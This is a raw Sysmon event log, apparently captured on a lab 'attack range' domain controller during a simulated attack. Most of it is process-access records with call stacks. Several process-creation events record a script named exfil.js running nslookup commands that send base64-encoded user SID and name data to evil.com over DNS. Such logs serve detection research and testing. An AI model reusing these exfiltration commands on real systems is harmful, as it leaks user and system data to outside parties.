14:16:38.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.970{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.970{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4F41-000000005F02}7404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.970{2E1864BB-17A1-629A-783D-000000005F02}55527944C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-4F41-000000005F02}7404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.983{2E1864BB-17C6-629A-4F41-000000005F02}7404C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmhqpd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.970{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsrsgp.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.938{2E1864BB-17C6-629A-4D41-000000005F02}75928028C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4E41-000000005F02}2032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.916{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4E41-000000005F02}2032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.916{2E1864BB-17C6-629A-4C41-000000005F02}59804936C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-4E41-000000005F02}2032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.928{2E1864BB-17C6-629A-4E41-000000005F02}2032C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-4C41-000000005F02}5980C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsrsgp.tmp 2>&1 10341000x8000000000000000202499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.900{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4D41-000000005F02}7592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.900{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4D41-000000005F02}7592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.885{2E1864BB-17C6-629A-4D41-000000005F02}75928028C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4C41-000000005F02}5980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.885{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4D41-000000005F02}7592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4C41-000000005F02}5980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-17A1-629A-783D-000000005F02}55528060C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-4C41-000000005F02}5980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.882{2E1864BB-17C6-629A-4C41-000000005F02}5980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsrsgp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.869{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkwuh.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.838{2E1864BB-17C6-629A-4A41-000000005F02}46407688C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4B41-000000005F02}7344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.838{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 